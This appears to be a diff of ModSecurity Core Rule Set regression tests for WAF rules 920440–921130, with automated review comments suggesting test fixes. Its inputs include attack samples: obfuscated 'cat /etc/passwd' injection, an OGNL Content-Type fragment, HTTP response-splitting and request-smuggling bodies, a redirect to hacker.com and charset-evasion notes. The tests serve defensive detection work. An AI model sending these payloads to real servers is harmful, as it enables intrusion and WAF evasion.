dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bak
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-2
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.db
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-3
desc: URL file extension is restricted by policy (920440) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.old
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-4
desc: URL file extension is restricted by policy (920440) - GH issue 1296
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /foo.bar.sql
version: HTTP/1.1
output:
log_contains: id "920440"
- test_title: 920440-5
desc: Redis dump file
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: "300"
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /dump.rdb
version: HTTP/1.1
output:
log_contains: id "920440"
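Review bot: All five tests in 920440.yaml are positive cases (`log_contains`), so a change that makes the rule match every request would still pass this file. Add one negative case with an extension that is expected to be allowed. The sample below is constructed and assumes `.html` is not in the configured restricted-extension list; confirm before merging.

```yaml
# … unchanged: tests 920440-1 to 920440-5 …
  - test_title: 920440-6
    desc: Extension outside the restricted list must not trigger 920440 (constructed sample)
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
              User-Agent: ModSecurity CRS 3 Tests
            method: GET
            port: 80
            uri: /index.html
            version: HTTP/1.1
          output:
            no_log_contains: id "920440"
```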


@@ -0,0 +1,112 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920450.yaml"
description: "Description"
tests:
-
test_title: 920450-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-range: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
If: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
lock-token: "test"
output:
log_contains: "id \"920450\""
-
test_title: 920450-4
desc: HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
no_log_contains: id "920450"
-
test_title: 920450-5
desc: HTTP header is restricted by policy (920450) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Lock-Token: <opaquelocktoken
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920450"
-
test_title: 920450-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "test"
output:
no_log_contains: "id \"920450\""
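Review bot: In 920450-5 the header value `Lock-Token: <opaquelocktoken` is unquoted and unterminated, and the `User-Agent` values in 920450-4 and -5 end at `rv`. Both stop where a colon would have followed, which suggests the original values were cut during conversion (inferred). The expectations appear to depend on header names only, so results are probably unaffected, but the line reads like a mistake. Quote it and say the value does not matter: `Lock-Token: "<opaquelocktoken"  # value irrelevant, header name is what is tested (TODO confirm)`.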


@@ -0,0 +1,83 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920460.yaml"
description: "Description"
tests:
-
test_title: 920460-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 22
Content-Type: "application/x-www-form-urlencoded"
User-Agent: "ModSecurity CRS 3 Tests"
data: 'file=cat+/etc/\passw\d'
stop_magic: true
output:
log_contains: "id \"920460\""
-
test_title: 920460-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=cat+/etc/pa\\ssw\\d"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
-
test_title: 920460-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920460\""
-
test_title: 920460-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""
-
test_title: 920460-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?file=\\\\\\c"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920460\""
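Review bot: Tests 920460-2 to -5 write `uri` in double quotes, where YAML turns each `\\` into one backslash, while 920460-1 writes `data` in single quotes, where backslashes are literal; the mix makes it easy to miscount what is actually sent. After decoding, 920460-4 sends two backslashes before `c` and 920460-5 sends three, both expecting no log entry, and neither test has a `desc`. Add `desc: "two literal backslashes before c (escaped backslash) must not match"` to 920460-4 and `desc: "three literal backslashes before c; expected not to match, confirm this is intended"` to 920460-5.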


@@ -0,0 +1,199 @@
---
meta:
author: "lifeforms, Franziska Bühler"
enabled: true
name: "920470.yaml"
description: "Content-Type header format checks"
tests:
- test_title: 920470-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl"
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-2
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"; garbage'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-3
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=/gar/bage'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-4
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "text/plain"
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-5
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset=UTF-8'
output:
no_log_contains: "id \"920470\""
- test_title: 920470-6
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'text/plain; charset="UTF-8"'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-7
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundary12345'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-8
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/json'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-9
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary=----formdata-polyfill-0.40616634299_704013'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-10
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary=-----boundary_data:55780(123,45:667)+part'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-11
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/mixed; boundary= gc0p4Jq0M2Yt,08/jU534c0p?==:test'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-12
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/form-data; boundary= test_data_123456'
Content-Length: 0
output:
log_contains: "id \"920470\""
- test_title: 920470-13
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'multipart/related; type="application/xop+xml"; boundary="uuid:a111aaa1-aa11-1a11-a11a-11a1111aa11a"; start="<root.message@cxf.apache.org>"; start-info="application/soap+xml'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
- test_title: 920470-14
stages:
- stage:
input:
dest_addr: 127.0.0.1
port: 80
method: POST
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: 'application/soap+xml; action="urn:hl7-org:v3:PRPA_IN201305UV02"; charset=UTF-8'
Content-Length: 0
output:
no_log_contains: "id \"920470\""
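Review bot: In 920470-13 the last Content-Type parameter reads `start-info="application/soap+xml` with no closing double quote before the YAML string ends, yet the test expects `no_log_contains`. If the missing quote is a typo, the value should end `start-info="application/soap+xml"'`. If it is intentional, the test pins that an unterminated quoted parameter passes the format check, and a `desc` should say so, because that is a permissive result for a header-format rule.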


@@ -0,0 +1,240 @@
---
meta:
author: "lifeforms"
enabled: true
name: "920480.yaml"
description: "Description"
tests:
- test_title: 920480-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=UTF-8"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=iso-8859-1"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=ISO-8859-15"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=windows-1252"
data: "test=value"
output:
no_log_contains: "id \"920480\""
# TODO: this case is not yet handled by 3.1, future work
# - test_title: 920480-6
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=UTF-80" #trailing garbage after 'UTF-8'
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
- test_title: 920480-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded;charset=garbage"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-9
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded; charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this test should pass (works with curl), to be researched
# - test_title: 920480-10
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037" # https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour slide 32
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded;charset=ibm038"
data: "test=value"
output:
log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-12
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=utf-8;charset=ibm037" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
# TODO: this case is not yet checked by CRS, future work
# - test_title: 920480-13
# stages:
# - stage:
# input:
# dest_addr: "127.0.0.1"
# port: 80
# method: "POST"
# headers:
# User-Agent: "ModSecurity CRS 3 Tests"
# Host: "localhost"
# Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" #double charset may cause evasion
# data: "test=value"
# output:
# log_contains: "id \"920480\""
- test_title: 920480-14
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\""
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-15
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset='utf-8'"
data: "test=value"
output:
no_log_contains: "id \"920480\""
- test_title: 920480-16
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
# random other IBM charset
Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\""
data: "test=value"
output:
log_contains: "id \"920480\""
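Review bot: The comment `# random other IBM charset` belongs to 920480-11 but was copied onto 920480-14, -15 and -16, where the charset is `"utf-8"`, `'utf-8'` and `"garbage"` and the point under test is the quoting of the value. Replace it in those three tests with `# charset value in double quotes`, `# charset value in single quotes` and `# unknown charset in double quotes`. A wrong comment here is misleading when someone later re-enables the commented-out TODO cases around it.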


@@ -0,0 +1,51 @@
---
meta:
author: "Christian Folini"
enabled: true
name: "920490.yaml"
description: "Tests for the charset protection in combination with the x-up-devcap-post-charset header"
tests:
- test_title: 920490-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
log_contains: "id \"920490\""
- test_title: 920490-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
x-up-devcap-post-charset: "ibm500"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""
- test_title: 920490-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "UP ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded; charset=utf-8"
data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7"
output:
no_log_contains: "id \"920490\""
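Review bot: The three tests in 920490.yaml differ only in the `UP ` prefix of `User-Agent` and in whether `x-up-devcap-post-charset` is present, and none has a `desc`, so the condition being tested is easy to miss. Inferred from the expected outputs, suitable lines are `desc: "UP user agent with x-up-devcap-post-charset is logged"` for 920490-1, `desc: "header is ignored when the user agent does not start with UP"` for 920490-2 and `desc: "UP user agent without the header is not logged"` for 920490-3. Confirm the wording against the rule before adding it.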


@@ -0,0 +1,49 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920500.yaml"
description: "Tests for backup or working file extensions"
tests:
- test_title: 920500-1
desc: "Check request filename ends with ~"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-2
desc: "Check request filename contains file that ends with ~ but not at end of string (bypass)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/index.php~/foo/bar/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920500\""
- test_title: 920500-3
desc: "Rules 920500 should not block user dir such as /~user/"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/~user/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920500\""


@@ -0,0 +1,97 @@
---
meta:
author: "Andrea Menin"
enabled: true
name: "920510.yaml"
description: "Cache-Control directives whitelist"
tests:
- test_title: 920510-1
desc: "block request with a response cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "private"
output:
log_contains: "id \"920510\""
- test_title: 920510-2
desc: "block request with an invalid cache-control directive in request"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-3
desc: "block request with an invalid cache-control directive in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1, foo=bar"
output:
log_contains: "id \"920510\""
- test_title: 920510-4
desc: "block request with an invalid cache-control syntax in request with multiple directives"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=1,,,max-stale=2"
output:
log_contains: "id \"920510\""
- test_title: 920510-5
desc: "allow request with valid cache-control single directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "no-cache"
output:
no_log_contains: "id \"920510\""
- test_title: 920510-6
desc: "allow request with valid cache-control multiple directive"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
uri: "/"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cache-Control: "max-age=123, max-stale, no-cache"
output:
no_log_contains: "id \"920510\""


@@ -0,0 +1,146 @@
---
meta:
author: "Christian S.J. Peron, Franziska Bühler"
description: None
enabled: true
name: 921110.yaml
tests:
-
test_title: 921110-1
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=%0aPOST / HTTP/1.0"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-2
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0aGET+/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-3
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-4
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+/foo%0d"
version: HTTP/1.0
output:
log_contains: id "921110"
-
test_title: 921110-5
desc: "HTTP Response Splitting"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+foo+bar"
version: HTTP/1.0
output:
no_log_contains: id "921110"
-
test_title: 921110-6
desc: HTTP Request Smuggling bypass with Content-Type text/plain
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: text/plain
Content-Length: 36
method: POST
port: 80
uri: /
data: "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n"
output:
log_contains: id "921110"
-
test_title: 921110-7
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921110"
-
test_title: 921110-8
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921110"
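Review bot: In test 921110-6 the hard-coded `Content-Length: 36` is much shorter than the `data` string, and nothing in the file says this is deliberate. Counting bytes, 36 ends the body right after `Something: `, so the remainder starting at `GET /b.html HTTP/1.1` is left on the connection as what looks like a second request; that appears to be the smuggling condition under test. A comment above the header, such as `# deliberate: 36 bytes ends the body after "Something: "; the rest is the smuggled request`, would stop a later cleanup from correcting the length. Whether the harness sends the header unchanged cannot be seen from this file and is worth confirming.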


@@ -0,0 +1,70 @@
---
meta:
author: csanders-git, Franziska Bühler
description: None
enabled: true
name: 921120.yaml
tests:
-
test_title: 921120-1
desc: HTTP response splitting (921120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
version: HTTP/1.1
output:
log_contains: id "921120"
-
test_title: 921120-2
desc: "HTTP Response splitting attack"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>"
version: HTTP/1.1
output:
log_contains: id "921120"
-
test_title: 921120-3
desc: "Fix FP issue 1615. Header followed by word chars."
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D"
version: HTTP/1.1
output:
no_log_contains: id "921120"


@@ -0,0 +1,83 @@
---
meta:
author: "csanders-git, Franziska Bühler"
description: None
enabled: true
name: 921130.yaml
tests:
-
test_title: 921130-1
desc: HTTP response splitting (921130) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E
version: HTTP/1.1
output:
log_contains: id "921130"
-
test_title: 921130-2
desc: "HTTP Response splitting attack: cookie data"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cookie: "oreo=munchmuch%0d%0a%0d%0a<HTML><title></title></HTML>"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/"
output:
